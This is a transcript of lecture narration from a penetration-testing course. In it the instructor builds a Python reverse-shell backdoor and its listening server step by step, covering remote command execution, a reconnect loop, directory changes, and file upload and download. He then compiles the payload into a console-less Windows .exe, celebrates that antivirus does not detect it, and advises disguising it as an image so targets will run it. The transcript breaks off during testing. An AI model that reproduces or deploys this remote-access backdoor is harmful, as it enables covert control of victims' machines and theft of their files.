yet. We still have more things to cover. Remember when I told you that port 80 is something that we will be attacking later in the course? Well, why port 80? Remember, port 80 is used to host a website, and websites have a lot of different vulnerabilities that we haven't covered yet. So we're going to do that in a section of its own. The next thing that we will cover are going to be the basics of web application penetration testing. And if I didn't mention it already, let me say it again. This is a huge topic. You might have also heard about bug bounties, and that is mostly referred to web app penetration testing. Nonetheless, once we finish that, we're also going to take a look at gaining access to the wireless access points. This will also involve password cracking, which we also haven't encountered yet, and after that, we're going to take a look at something not so important but interesting, and that is called man-in-the-middle attack. We're going to see exactly how it works once we get to it, but for now you can just remember it as an attack that will allow us to steal information on a network from other devices connected. So we still have a lot to go. But before we do any of these, I have another surprise for you, and that is another coding project. That's right. It is time to create a tool that will have something to do with all these exploitation things that we covered in last few sections. And for this, I've picked to show you how to code our own payload. I believe this is what most people would want to see. So we're going to code it ourselves. It won't be anything too advanced, but you will get a good understanding of behind the scenes on how payloads and reverse shells work. And by the end of that project, you will have a working backdoor that you can send to the target and execute commands with the help of it on the target machine. Cool, right? Now that you know what the surprise is, we're ready to get straight into backdoor creation in the next video. See you there. Welcome to our second coding project. As we already know, we're going to create a working backdoor, and as the previous project was in Python, this one will be as well. However, if we think about it a little bit, you might realize that in order for our project to work, and in order for us to successfully communicate with the target machine using our backdoor, we must create two programs, a server and a payload. One will be running on our Kali Linux machine, and the other one will run on our target machine. What will happen is they will communicate between one another, and from the server we will be sending our instructions that we want our target to execute. Then the payload will send us back an output. So it would pretty much look something like this. Kali Linux machine is running the server program, and the target is running the payload or our backdoor. Once we get to creating these, you will notice that the code of these two programs will be rather similar due to them working together. We will be sending commands from our Kali Linux machine. For example, if we wanted to check out all the files in the current working directory on the target machine, we know that the command for this is dir on Windows and ls on Linux. Once we send that from our server, we would want our target to send us back the response, which will contain an output of all the files and folders inside of that specific directory. Now, that is just an example of one command. We of course want to be able to execute all the commands that we can run inside the regular terminal or command prompt, And we will see exactly how to do that. To code this, we will need knowledge of reverse shells, which we already have since we covered the exploitation section. We know exactly how reverse shells work, and another thing that we must be familiar with are ports and IP addresses, and this is also something that we know. This will not present us a problem. We need to be familiar with Python sockets, and this is something we briefly touched in our first coding project. However, I will do my best to explain it once again in the code that we're going to use. And last, at the end, we will need to compile the Python code to .exe for our Windows targets. This is something you should not worry about since I will demonstrate how to do this after we code our programs. So now that we know what we are doing, without further ado, let's get straight into the coding lessons. Welcome back. Time to start coding our backdoor. So in this video, we're going to start with the base of our program. Remember that we must create two different programs, a server and a backdoor. And it doesn't matter with which one we start, so let's in this case start coding the server first. We're going to code both of them simultaneously. So what I'm going to do is I'm going to open the terminal, and remember that we have this tools directory from the first project. Let us navigate to there, and instead of the port scanner, we're going to make another subdirectory inside of here and call this backdoor. Then we're going to change the directory to the subdirectory, and here we're going to code our tools. So as I said, let's start with server first. To do that, we type server.py. We open it using Nano, and here we're going to code our project. So what's the first thing that we must do? Well, since these two programs are going to communicate with one another, they must establish a connection first. And we know that we can do that with the help of a socket library. So socket allows us to initiate an internet connection between two machines. So how are we going to do that? Well, first thing that we must do, and that we also did inside of our port scanner, is we must initiate a socket object. And I'm going to call my socket object sock inside of the server.py. And to initiate it, I will type socket.socket. So we're doing this with the help of the socket library, and here in the brackets we want to specify two different parameters: socket.af_inet, socket.sock_stream. And I know what you're thinking, what even are these arguments? Well, this socket.af_inet tells our program that we're going to make a connection over IPv4 address, and the socket.sock_stream tells our program that we're going to use the TCP connection. So simple as that. Now, the next thing that we want to do is we want to bind the IP address and the port. This is something that we already did inside of our first project, so there's nothing really too much to explain right here. We just type sock and use the method.bind, open two and close two brackets, and the first parameter is going to be the IP address of our Kali Linux machine. In my case, if I go and check it out, this is .1.12. So I will go right here and specify 192.168.1.12 as the first parameter, and remember it must be between the quotes. Then I will specify comma, and the port that we're going to use, well, we can just go with port 5555. Why not? It doesn't even matter, to be honest. After we do all of this, we binded the IP address with the port. And now the next thing that we must do is we must start listening for the incoming connections. Remember, this was the crucial part in the reverse shells. The target executes a payload, but we must listen for the incoming connections. And that is exactly what our server program will do. It will listen for the connections, and once the target executes a payload, they will connect to our server program. So to do that, we can first print like this. Let us print listening for the incoming connections, just so we know at which part of the program we are. And below that, we can type sock.listen, and we're going to specify 5 in the brackets, meaning that we're going to listen up to 5 different connections. Okay, so our program will now be stuck on this part until the connection is established. Once the target tries to connect back to us, we need to store their connection in a few variables. In other sense, we need to store their socket object that we're going to use to communicate with the target, and we're also going to split that into an IP address. So what I'm going to do is I'm going to type target, IP. These are going to be two separate variables, and they're going to be equal to sock.accept. And this accept method is simply just accepting the incoming connection and storing the target's socket object right here and the IP address in the second variable. Simple as that. Once we do that, and once the connection is accepted, we can print that target connected, and we can add from. And what we're going to do here is we're going to close the quote and add a plus sign and then the string of the IP variable. And once again, remember, the IP variable will store the IP address of the target. So what we're essentially doing right here is we're printing that we got the connection from the target's IP address. Okay, we need to close one more bracket right here. And what we're going to do at the end is we're just going to enter a function called target communication. Now, of course, this function doesn't exist and we're going to code it in some future video, but for now on, let's just leave it right here. We successfully created a socket object, binded the IP address with the port, we listened for the incoming connections, and at the end, we accepted the connection from our target system. We're going to leave it at this for now on our server program, and let's go to our backdoor program. Now we need to figure out the code for our backdoor to make it connect to our server.py. So first thing that we're going to do is, of course, to import the socket library. Then, as in the server program, we need to initiate the socket object, and I'm not going to call it sock right here, I'm just going to call it s. And here we're going to specify the same parameters, socket.af_inet, socket.sock_stream. We already explained what these are, and the only thing that we need to do right here is we need to connect to our target machine. But we're not going to use the connect method right here. What we're going to do is we're going to call the connection function. And of course, this is a function that doesn't exist, so we must code it up here. Let's define it first. So define connection. It will take no parameters between the brackets. And what we're going to do is we're going to type right here try, which is the try statement. So it will try to connect to our Kali-Linux machine. And remember, the connect function requires two open and two close brackets, the same way that the bind function does. And it also takes the two parameters, which the first one is the IP address of the machine that we want to connect to. So this will be the IP address of Kali-Linux machine once again. And the port will be once again the port 5555, because we want to connect to that port, since our server program will be listening on that port. If it manages to connect, we're going to enter a second function, which is going to be called shell. And this shell function also doesn't exist. We're going to code it. And what will be the purpose of this shell function is executing the commands. So for now on, we're just going to leave it right here, and we're going to code it later. Once we leave the shell function, we can close the socket object, and in the accept statement, we can call again this connection function. Now you might be wondering, why are we doing this? Well, if I add something like this right here, so I go and type while true, which is, remember, the infinite loop, and I tab all of these commands once, so they can belong to the while true loop. And right here, I'm going to also add a statement time.sleep. And give me just 1 second, I will explain why I'm doing this. Let me just code the function till the end. I will break right here and I will import the time library because we're going to need it since we use it right here. So what are we doing right here? We're calling the connection function. This connection function starts an infinite while true loop. This infinite while true loop sleeps for 20 seconds and then it tries to connect to our Kali-Linux machine. If it manages to connect, it will go inside of the shell function where we will execute the commands on the target system. If it doesn't manage to connect, it will go into this accept statement and it will call the same function once again. So what does this tell you? It will run this function infinitely until it manages to connect. So this is good because of one reason. We don't want our target to start the payload and not be able to connect just because we haven't started the server yet. We want to be able to connect to the target system whenever we want. So this function will tell the payload to try to connect to every 20 seconds. Every 20 seconds while their machine is running, this program will try to connect to our Kali Linux machine. So we can start the server at any point of time, and after 20 seconds, it will establish a connection to us. So this is just calling this function over and over again until this line right here works and they connect to us. Then we enter a second function, which is the shell function. Okay, this is the base of our backdoor.py. Here is how we are going to connect to our server, and in the next video we're going to see what we're going to do with the contents of the shell function. And if I save this, Ctrl O, and also the target communication function. So these are the functions that will receive and execute commands. Feel free to post any question if you have about the code, if there is something that you do not understand. And in the next lecture, we're going to continue with the coding of our programs. See you there. Welcome back. Let's continue with our programs. So in the previous video, we managed to establish a connection between these two programs. Or we didn't really manage to establish, but we created a part of code that will establish the connection once we run these programs. Now let us go to our server program first, and let's figure out this target communication function. Remember, this function will send the commands to the target system that we want to execute, and it will also receive the response of the target system. So let us code it up here, and we're just going to start it, and then we're going to go to the backdoor program. First thing that we're going to do is we're going to initiate the function. So define and then target_communication. As we can see, it takes no parameters, and what we're going to do straight away inside of this function is we're going to enter an infinite while true loop. What we will essentially do here is we're going to ask for a command from the user of this program, and then we're going to send that command to the payload and go back to the beginning of this while true loop once we receive the response. Let me show you what I mean. Inside of here, the first thing that we want to do is we want to initiate a command. Since we don't know what command we want to execute, we're just going to use an input statement that will allow the user of this program to type in the command. And we're going to write it like this. Let's make it pretty. Let's make it look like a terminal. And use this sign, %s, and you're going to see why we're using this %s in just a second. So after the %s, type 2 dots and then empty space and add a single quote at the end. And here you can add another % and string of IP address. And if you don't know Python, you're probably wondering what even happened here. Well, this is a statement that will print out. And once we type this %s, it will get exchanged with this string of IP address. And remember, our IP is simply the IP address of the target system that we initiated in this line right here. So what this will print is it will print the shell, and then after it the IP address of the target machine, and then 2 dots, and here we will be able to type in our command. We just made it look a little bit prettier once we run the program. So the next thing that we want to do is then send that command. And we're going to use a function that I'm going to call reliable send, and this function also doesn't exist. It will take one parameter, which will be the command itself. So we're sending the command to the target. Now this reliable send function is something that we will code in the next lecture. For now, just picture it as the function that will send this command to the target system. Then right here, after we send the command, we want to check out what this command was. For example, let's type if command equals to quit. Then this will initiate to our program that we want to exit out of the shell, and we want to exit this program. So we're just going to break out of this while true loop, and that will end our program. So remember, once you type quit, that means you want to stop communicating with the target system and you want to close this server program. So we're going to break out of the while true loop, and that will exit out of this target communication function, and then it will exit out of the program. If it is not quit, So else, we're going to type right here result equals and then reliable_receive. And this function is also something that we will create in the next lecture. For now on, just picture this function right here as a function that will receive the response from the target after the target runs our command. Then we're going to store the response inside of this result variable, and we want to print the result. Simple as that. So let's go through this real quick once again. We're asking for the input of the command, then we are sending that command to the target. We check if the command was quit. If it was, then we exit the program. If it wasn't, then we store the response of the command that we received using this function to this result variable, and then we print out the result. For example, if the command was ls or dir, that command lists out all of the files and folders inside of a directory. We would then store this inside of this result variable, and then we would print out all of the files and folders inside of the target's directory. Simple as that. Now that we did this, let's go to our backdoor program and code something similar. Just inside of this backdoor program, we do that using the shell function. So what I'm going to do is I'm going to go below the connection function, and right here I will initiate the shell function. And as our target communication function, the shell function will also start with a while true loop. Then what we're going to do is we're going to create the command variable, and in this program, this command variable will receive the command that our server sent. So in backdoor, we first receive the command. Then after we receive the command, we check if that command was quit, the same thing that we did in our server, and in the same way, we're going to exit out of the program by breaking out of this while true loop. And the other case, we want to execute the command. But this is something that I'm going to type as a comment for now. So here in the else statement, we want to execute the command. And the reason why I'm not typing it right now is because this execution of command requires another library we're going to touch on as soon as we finish coding these reliable receive functions and reliable send functions. So first we need to code them, and then we're going to go and type the code of the command execution. So for now we just start at the base of our shell and target communication function, and we're going to continue coding them in the next lecture. See you there. Welcome back. Now that we covered our shell and target communication functions, it is time we employ the reliable send and reliable receive functions. So if I go to my server code right here, you will notice that we did code a part of the target communication function, but this is not really working. These functions do not exist. We must create them first in order to be able to successfully send and receive data. Let's start with the reliable send function first. Since that one is easier, we just need to send the data. And for this, we're going to use the JSON library in order to more easily parse the data. So down here, I'm going to define reliable_send, and reliable send will take one parameter. As we can see right here, it has to be the data that we're going to send, so we're just going to name that parameter data. Then let's add two dots, and inside of the function, we're going to define something called JSON data. And this is going to be a variable that is going to store the output of the dumps method from the JSON library onto our data. Now keep in mind that this data is the actual command in our case, since inside of the target communication function, once we call the reliable send, it parses the command inside of the brackets. So you can just change those commands to be this data right here. Then we perform the JSON dumps onto that command and we store it inside of JSON data. And finally, we can use the send function from the socket library onto our target to send the actual data. So we can type JSON data. And just to remind you, this target is the actual target socket object that we get once we accept the connection. We're just using a socket send function onto this target object once we're sending the data. But one more thing before we finish with the reliable send function is that in Python 3, once we are sending the data over sockets, we need to encode that data. So we can do that by simply specifying inside of the brackets our data and then encode function onto it. Then it will first encode the data and then it will send it with the send function. Simple as that. Now the same thing we need to do with our reliable receive, so I'm going to code it right here, reliable receive, and we know that the reliable receive doesn't take any parameters inside of the brackets. And what we're going to do to receive the data is we're first going to define a variable to be an empty string. We're just going to call it data. And we're going to then enter inside of the infinite while true loop. Inside of that loop, what we're going to try is we're going to try to get the data by typing data equals data plus target.receive, and just to remind you, the receive function is the function from the socket library, so we're just using it once again onto our target connection, and this receive function takes 1 parameters. That is the amount of bytes that we want to receive. In our case, we're just going to specify 1024 bytes. But this is not everything that we must do. Remember that once we are sending the data, we actually encode the data. Well, in order for us to get the data as it was before it got encoded, we must then decode the data once we receive it, right? And at the end, we're going to add a strip function onto all of this. Okay, great. After that, once we receive the data, we can return from this function the JSON.loads of our data. And this is just the format that we're going to output it, since remember, we must return from this function as it does get stored inside of a variable. Our result will be our data. And in the accept statement, of course, we must not forget that. So I'm going to go down here and add accept, and what we're going to accept is the value error. So in case we get the value error, we're simply going to continue with the execution. So once again, what is this function doing? Well, it initiates a data variable to be empty string. Then we try to get 1024 bytes from our target. We add it to the previous data that we received. Then we decode that data, of course, before adding it, and then we strip it from any additional characters. We then return the JSON loads of that data, and that will be stored inside of the results variable that we then print to our screen. So all we need to do right now is we need to add these 2 functions to our backdoor code as well. So copy them, save the server code, and then nano backdoor, go up here, and paste the functions. However, there is one thing that we must change, and that is this target.send right here. Since we are not sending to the target from our backdoor, we are sending to the server, and we initiated the socket object to be S. So this is our only socket object, and we're going to use that to send our data. The same thing we want to do inside of the reliable receive function. We are not receiving from the target using the S socket object. Since if we left here target is undefined inside of our backdoor code, therefore it will throw us an error. Everything else can stay the same. And now that we got these 2 functions ready, in the next video we're going to write the part of the code that will execute the command. It is once again stored in this else statement right here. We for now on just put the comment, and in the next video we're going to use the subprocess library to perform the action of executing the command. See you in the next video. Welcome back. Time to write the code that will execute our commands inside of our payload. So as I already mentioned, for this we're going to need an additional library. So go to your backdoor program and import subprocess. This library will allow us to execute any command that the server sends. Let's go down here, where we added a comment for the command execution. We can delete it right now, and to execute the command, we can do something like this. We can initiate, execute, and we're going to equal that to the subprocess.popen, and this stands for process open. This process open takes a few parameters, and the first one will be what we want to execute. In our case, we want to execute our command. The second parameter we can select to be shell equals true. And there are some additional parameters such as stdout equals subprocess.pipe, and make sure that you type this pipe in the capital letters. Another parameter stdr equals subprocess.pipe, and the last one will be stdin equals subprocess.pipe. These are all the parameters that we need to specify right here. The most important one is that you specify this command as a first argument. Once we initiate the process open onto the execute, we can create a variable called result that will be equal to execute stdout.read. So we want to read the output. We're also going to concat to this the execute stdr.read. So these are the two things that will give us an output of the command. Then we will store them inside of the result variable, and this line that I'm going to write right now could be a little bit tricky. Let me write it first. Result.decode. You might be wondering, why are we decoding this? Well, if I go up here, in the reliable send, we're going to encode our data. And this result is something that we're going to send in the next line. And once we perform these two lines, we already get an encoded data. So if we don't decode it first and we try to send it straight away, it will throw us an error. It will not be able to do that because it is going to try to encode unencoded data. That's why first we must decode it right here, and then in the next line we're going to type reliable_send, and we're going to send our result. Great, now that we did this, let us test our program. And to test this program, you're going to need a Windows environment to compile it, and you're going to need any version of Python 3. Now, in my case, I'm using Python 3.7. So I would advise you to use the same version, so just download the Python 3.7, because if it works for me, it will most likely work for you. After you do that, what we must do is we must copy our backdoor to our Windows 10 machine. Why? Well, we're going to compile it on a Windows machine. For this, you can use a Windows virtual machine if you'd like. Just make sure you download Python 3.7 onto that Windows virtual machine. Once you do that, you can copy the backdoor. I am first going to copy it to my Kali Linux desktop. So home Mr. Hacker and then desktop. And from the desktop, I'm going to copy it onto the Windows 10 desktop. Great. Now that we copied it, we're going to need a few things in order to compile this program. So first of all, open your command prompt on your Windows machine, navigate to the directory where your backdoor is, and to compile this program, we're going to need a PyInstaller library. You can install that library using pip, as usual. Once you get the PyInstaller library, you want to go to the directory where your backdoor is and type PyInstaller, then the name of the program, in my case backdoor.py, and we're going to use two different arguments. One of them is one file and the other one is no console. Once you specify all of this, press enter, and this will compile our Python program for us. Now, one thing to keep in mind is that you must have all the libraries from this program installed using pip in order for the compiling of the program to be successful. So in this case, our backdoor right here, if I edit it using Notepad, we only have these three libraries, and all of them are already by default in Python, so there is no libraries that we must install yet. But in future, if you keep adding onto this program and you add additional libraries that might not be by default installed in Python, you will need to install them first using pip, and then you can compile the program successfully. Okay, great. Now that we compile the program, we're going to have these four folders. We're going to have the dist folder, this PyCache folder, this backdoor.spec file, and the build folder. These three right here, you can delete straight away. We don't need them. And this dist folder will have our executable. Here it is. It is called backdoor.exe. And you know what is the cool part? If I scan it using the latest version of Windows Defender, here it is, 0 threads found. So we created an undetectable backdoor that we coded. Amazing, right? Now to test it to see whether it works, first thing that we must make sure is that the IP addresses and the ports are set correctly, and that is something that we should have done before actually compiling the program, but in my case I remember that I set the 192.168.1.12 to be the IP address of Kali Linux machine, and the port 5555 to be the port to connect to, which is in my case correct. So what I'm going to do is I'm going to use Python 3 to start my server. It will print out listening for the incoming connections, and if I go right here, execute the backdoor.exe, nothing seems to be happening, but that is good. We don't want our program to open anything. But if we go back to here and we wait a couple of seconds, because remember that we set the time.sleep command to be 20 seconds before actually connecting to our Kali Linux machine, and after 20 seconds, here it is. We get the shell from our Windows 10 machine. We get shell written and then the IP address as well as the port from which the connection is coming from. Now if I try to execute some of the command prompt commands, such as for example who am I, it seems to be stuck, so there is something wrong with our code. Let us go and check our server first to see whether everything is good. So we got our reliable send and reliable receive functions. Everything seems to be good. But right here we reliable receive the result and then we print it out. So this could be the problem. Let's check it out inside of our backdoor code as well, just to make sure that everything is good here. And after a few minutes of searching, I managed to find the error. So the error was inside of the backdoor code. The first thing that I didn't do is I didn't import this JSON library inside of my backdoor code. I only copied these two functions from the server code, but I forgot to import the JSON library. So that is the first thing that we must do. I already did it right here. And the second thing is the typo right here in this line. We typed rstip and it should be rstrip. We need to fix that both here and inside of the server code. So go down here and change the rstip into r and then strip. Save right here as well. And we're going to copy the backdoor.py to the home Mr. Hacker and then desktop. So we're going to recompile it once again. All of these things we do not need anymore, so I'm going to delete them. If it tells you right this that the file is currently in use, that is because we ran it, and to close it we can go to Task Manager, find the backdoor.exe that is running and close it inside of our Task Manager. Then we should be able to delete the dist folder. Great. Now that we did that, what I'm going to do is I'm going to once again copy the backdoor.py onto my desktop, and I'm going to compile it once again using the command prompt. So pyinstaller backdoor.py --1 file and --no console. Press enter. While this is compiling, let us go to our Kali Linux machine and let us start our server. Python 3 server.py, it will listen for the incoming connections, and right here we can go to the this directory and execute backdoor.exe. Once again, these other files we do not need, so you can delete them, only leave this directory with the backdoor.exe. And in just a few seconds, we should receive the connection right here in our Kali Linux machine, due to the timeout of 20 seconds that we coded inside of our program. And if I type who am I right now, it works. I can execute commands on the target machine. If I type dir, it will tell me that the only file in the directory is backdoor.exe, and that is because we're currently inside of this dist directory. If I type ipconfig, it will tell me my IP address. I can type the netstat command to get the netstat output, where it will tell me all of my current connections on that target machine. But if I, for example, try to go one step back, this will not work. I will still be in the dist directory. So it seems that our program works, we can execute the commands, but for now on, we can't seem to change the directories into a different directory. And that is something that we must see how to fix in the next video. But for now on, it is good that it works. We saw how we can compile the program to exe using PyInstaller. So once again, just install Python 3.7 on a Windows machine, install PyInstaller for the Python, and install all the libraries that you're using inside of your program. In our case, we are not using any additional libraries outside of the standard Python libraries, so we didn't need to do that. Only thing we needed to do is to install PyInstaller and then use the command PyInstaller, program name, one file, and no console as options. And this should compile the program for you. Once you execute it, it should connect to the server that we are running from our Kali Linux machine. And let us test the quit command. If I press enter, it closes the program right here in our terminal. But does it also close the program in Task Manager? Let us check it out. And it indeed does. So we also close the program on the target machine with the quit command. Great. In the next video, we're going to see how we can successfully change directories using our program. Welcome back. Let us see how we can implement the changing of the directory inside of our server and backdoor. So in the previous video, we tested our program for the first time and we were able to execute all of the commands. But once we tried to change the directory on the target system, we weren't able to do that. We were stuck in the same directory. So let us see how we can bypass this and how we can be able to change the directories inside of our backdoor code. The first thing that we must do is we must nano our backdoor, and down in the shell function, here we must add an option if the command starts with cd. First, Python has a library that is called OS library, and with the help of the OS library, we can change the directory with just one single command. So first thing that we must do is we must import that library. Go up here and import OS. Once you do that, down here in the shell function, here we must add the command or the statement, which will say else if command, and then equals to cd empty space, then we will change the directory. But you might notice that there is something wrong with this statement right here. For example, we are comparing the command with cd and empty space. But most likely the command will be something like cd and then desktop. So if it compares this with this, these two will not be the same, even though they start the same. So what we must do instead of comparing the entire command, we must compare just the first three characters. And we can do that by specifying square brackets and then 2 dots up to third character. In other words, all of this just means that we are comparing the first 3 characters of the command with cd and empty space. And empty space is the reason why we're comparing 3 characters and not 2. After we compare this and they do match, then we can use the OS library and the function which is called chdir, which stands for change directory, onto the command, and then right here we need to do the quite opposite thing that we did, which is from the third character and then till the end. Since this function will be something like this. If we ran the command cd desktop, then this function will do something like this: os chdir and then desktop. So what we essentially did is we compared this, and then if they did match, we then used this part of the command to change the directory. And this is pretty much it. We don't need to add anything else. This will change the directory for us. However, this is not everything that we must do. What else we must do is we must go to the server code and add the same command inside of our target communication function. So right here, we can add another else if statement, else if command equals to cd empty space, and here remember that we also must add from the beginning up to third character. Just in this case, we are not going to do anything. we're going to just pass. Because in server, we don't want to do anything, we just want to go back to the beginning where we can send the next command. And in the backdoor code, we simply just change the directory of our program. Now, there is one more command that I want to add in this video, and that is the clear command. This is not really that useful, but once you have a bunch of commands and outputs on your desktop, you can use something similar to this that we use right here. So if I, for example, type sudo ifconfig, and it outputs me with the ifconfig command, I can just type clear to clear the screen. So let us do something similar inside of our code. First, we're going to go with the server, and if we send the command clear, this command will get sent to the target. However, we want to execute it right here inside of our server, since there is no point in executing the clear command inside of our backdoor code on the target system. So what we're going to do right here is we're going to add another else if statement, else if command equals to clear. We're going to use once again the OS library, and we're going to call the system command, which will execute the clear command. This system function allows us to specify any command in the brackets, which will then get executed inside of our terminal. Of course, since this is inside of a server code, we must import the OS library here as well. And since the command will get sent to the backdoor as well, we want to cover that step also inside of our shell function. So let us go right here and add else if statement command equals to clear. Just in this case, we will pass and not do anything. Okay, simple as that. And these are just two commands that I wanted to cover in this video, which only this cd command is really important for us right now. But in the next video, what we're going to do is we're going to see how we can download and upload files to the target system. Then at the end, we're going to test our final version of program and see whether all of these commands that we imported work or if there is something that we must change. So for now on, we got execution of the command, changing of the directory, we can clear the screen if we got too many things happening, and we can quit outside of the shell. Great. Let us continue coding in the next lecture. Welcome back. Time to code our download and upload functions. So for now, we coded a bunch of different options such as executing commands, quitting out of the shell, changing directories, clearing the screen. But let's also see how we can create two functions that will allow us to download and upload files on the target machine. So let's start with server first. I'm going to navigate to my tools and to the backdoor directory. Here I will nano our server, and inside of the server down here, we want to code the download function first. So download function will be used to download the files from the target machine. And the reason why I'm saying this is because even though it is obvious, from our server we will be downloading files, but from our backdoor code we will be uploading files. What do I mean by that? Well, since backdoor will be running on the target system, for that machine the code will upload a file to our server, while from our server perspective we will be downloading that file to our Kali Linux machine. So inside of the server, here we want to add an option else if the command and then first 8 characters. And you might be wondering why first 8 characters? Well, because download has 8 characters. And we're comparing if the command starts with download, then we're going to download a specific file. And to do that, we're going to use download_file function. This function will take the parameter of the file name, so we're going to type command and from the 9th character till the end. Of course, this function we're going to code right now, but just to clarify why I wrote it like this is because once again, if the command is something like this, download file.txt, we're comparing first 8 characters, if they are equal to download. If they are, that means we are downloading a file, and then we will paste this to this download file function, since we're going to strip first 9 characters off, which will be the download word and the empty space. Okay, now that we did this, let us code the download function up here. So we're going to code it below the reliable receive. Let us define it first, so define download_file. as we already know, this function takes one parameter, which is the file name. And this is going to be a little bit of a harder function to code, but let's give it a try. We're going to start like this. We're going to initiate a file object, and how we do that in Python, we simply specify the file object name and then we open it. But besides of opening it, we must specify the way we want to open it, whether we want to open it for reading or for writing. That is a second parameter to this open function. In this case, since we're going to download a file, we want to write the content that we receive from our backdoor to the file that we create on our Kali Linux machine. Therefore, inside of our server code, we want to write bytes. So what does this mean? Well, we're opening this file object to store the contents of the file that we want to download. That's why we're going to write that content. And this W stands for write, while this B stands for bytes. So we're essentially writing bytes to our file. Then another thing that we must add is the target.setTimeout. This is a cool function that we get from the socket library, and we're going to set the timeout to be 1 in this case. Why? Well, sometimes if we don't set the timeout, it might actually get stuck and not allow us to download the file. Of course, this timeout is something that at the end of this function we must remove so it doesn't interfere with other commands and connections. But for this function, we must set the timeout so our program doesn't crash. Great. Once we initiate the timeout, we're going to initiate a variable called chunk, and this chunk will be a small parts of data that we're going to receive multiple times. So we're going to type target.receive, and we're going to specify inside of the brackets amount of bytes that we want to receive. In this case, we're going to use 1024 bytes. So how are we going to keep receiving data until the file size is over? Well, we can just type while chunk. And this while chunk will simply run this while loop as long as there is something inside of the chunk variable. And if there is something inside of the chunk variable, we want to write that something to our file. And we do that using our file object that we called f and using the write function onto that object. So file.write, and we are writing the chunk inside of that file. Then after we write that, we're going to try to receive the chunk once again. So chunk equals target.receive. We're going to go with the 1024 bytes once again. And if we run into a timeout, so socket.timeout as error, we are going to simply break out of this while chunk loop, because that would mean that we reached the end of the file. And at the end, let's not forget to set the timeout to non-existent. So we can do that by specifying target.setTimeout to none. We're simply just removing this statement right here that we initiated at the beginning of the download file function. And the one last thing that we must do is anytime that we open a file object, once we are finished with that object, we must close it inside of our function. So I will just type f.close. Great. This is our download file function that we're going to run inside of the server code. Now let's see how we can create the correspondent function to this inside of the backdoor code. Remember, from here we're downloading a file, but from the backdoor we are uploading a file. So what we must do right here is inside of the shell function, we must add an else if statement. So else if command, first 8 characters are equal to download. We are doing the same thing that we did in our server, just here we're going to call upload file onto the file name. So from the 9th character till the end. Since our backdoor is uploading a file, the function will be quite a lot easier to code. So let us go up here, and below the connection function we can define upload file. This of course will take file name as the parameter, and only thing we need to do is open the file that we want to upload to the server. In this case we're going to define the file name as the first parameter, just as we did inside of our download file in the server code. Just this time we're going to read bytes from this file. Why? Well, from the backdoor we're not writing or storing a file onto the system. we're simply just reading the contents of the file that the server wants to download, and we're going to send that content to our server program. So how can we do that in Python? Well, we can type s.send, and the thing that we're sending is file.read. This is the entire upload file function. But before we actually close off this video, we must also code the upload function. What if we want to upload a file to the target system from our Kali Linux machine? Well, it is pretty much the same thing. We just need to reverse these two functions, which are upload file and download file. So what I'm going to do is I'm going to copy this function, save this program, go to my server code, and I'm going to paste the upload file function right above the download file. Just here, I'm going to change the s.send into target.send. When will this function run? Well, it will run if the command starts with upload. So let's define it down here in the target communication, else if command and first 6 characters are equal to upload. Then we are calling the upload file function onto the command and from the 7th character till the end. Once again, from the 7th character, because after the 7th character starts the name of the file that we want to upload. Okay, great. And one more thing that we must do is now we must copy this download file function and add it to our backdoor code. Let's save this, go to our backdoor code. And since we already have the upload file function, right below it, we're going to add the download file function. But of course, we must change this target into S because target is not initiated inside of our backdoor code. Here as well. Inside of this statement as well we must change. And at the end, once we remove the timeout, we must also add S. Great. Now that we did all of this, our functions should run. Just before we close off this video, we must also add the upload option inside of our shell function. So let's just go down here below the download and type else if command first 6 characters are equal to upload. Then what we want to do is we don't want to upload a file, we want to download a file. And it is the same principle as with the previous function. Since if the server sends the upload command, it wants to send its own file to our backdoor. Therefore, from the backdoor perspective, we are downloading that file to the target system. And what we must specify is command from the 7th character till the end. And that would be about it. We coded the download and upload functions. Now, we're not going to test them inside of this video, but in the next video. We're also going to test our previous commands and see if our backdoor works on the target system, if our quit command works, if execution of the commands work, if we can change the directory, and at the end, we're going to see whether we can upload and download a file from that target machine. See you in the next video. Welcome back. In this video, we're finally going to test our backdoor. Now, we're going to see whether we get some errors during the compiling of the program. We're going to see if all of our commands work. So we will be testing uploading files, downloading files, and other commands as well. And if we encounter any error, we're going to fix it to make our backdoor fully work. Now, the first error that I want to change from the previous video is inside of our backdoor code. And what that is right here in the upload command, I didn't specify download file, I only specified download. And if I were to compile this program, this function would not work because there is no download function inside of our code. There is only download file function. Now that is the only error for now. Let us save this. And if we go and compile the program, so what I'm going to do is I'm going to copy the backdoor.py to the home, Mr. Hacker, and then desktop. Then I'm going to paste the backdoor onto my Windows 10 desktop so I can compile it later. And right after it, I'm going to check out whether I set the IP addresses correctly. So what I got inside of our server and backdoor is the IP address of 192.168.1.12 and port 5555. Now, port is something that we do not need to change unless some other program is using it. But what we must check out before running both of these programs is our IP address. So in my case, it does match. My IP address is 192.168.1.12. So I can straight away start my server. It will listen for the incoming connections, and while it is listening, I will go and compile my backdoor. So for this, I will open the command prompt, I will navigate to the desktop directory, and if you remember the command, we must run pinstaller, then the name of the program, and then --1 file, and --no console. Once we specify this command right here, then we can press enter. Now what you can do after you test out this program and it works successfully, then you can apply other methods such as making it look like an image, something that we already covered before, to make your backdoor even more trustable to the target so they can execute it. Our compiling of the program has finished, and here we get those 4 files. These 3 we can delete straight away, and all we need is this directory. We have our backdoor.exe, and if we run it, remember that inside of our code, it will wait for 20 seconds before establishing connection to the server, and hopefully in just a few seconds, we should see right here a shell pop up on the target system. And here it is. We got the connection from 192.168.1.4, which is Windows 10 machine, and it is initiating the connection from this port number. Now let's test out all of the commands that we applied to our code. So first of all, let's start with simple commands such as simple command prompt commands, which are whoami, ipconfig. Let's run netstat to see whether we are going to be able to see all of the connections that our Windows 10 target machine has, and we do manage to see it. If I type dir, I will only see backdoor.exe because inside of the this directory we only have backdoor.exe program. Now comes the crucial part. Are we going to be able to change the directory to one step back and see the contents of the desktop directory? Let's give it a try. If I type the command cd and then 2 dots, press enter, run dir command, and here it is. We successfully changed the directory to the desktop directory. Let's try to go to some other directory. Let's for example go one more directory back. So if I type once again, type dir, and here it is. We're one directory back and we can change the directory from here. If I go to documents, now I'm inside of the documents directory, so I can successfully change the directory to whichever folder I want. Now, before we continue with execution of other commands, let us navigate back to the desktop directory on my Windows 10 machine, and from here, let us test out whether we can upload and download files. So what I got inside of my tools directory on my Kali Linux machine is I got this tester.txt file. And this is simply just a txt file that says hello world. What we want to do is we want to see whether we are going to be able to upload this file to the target system. So let's give it a try. If I go right here and type upload tester.txt, now before you run this command, make sure that the file that you're trying to upload is in the same directory as your server.py. Otherwise, you will need to specify the full path to that file, because if you don't, this will not work and it will probably crash. So let's 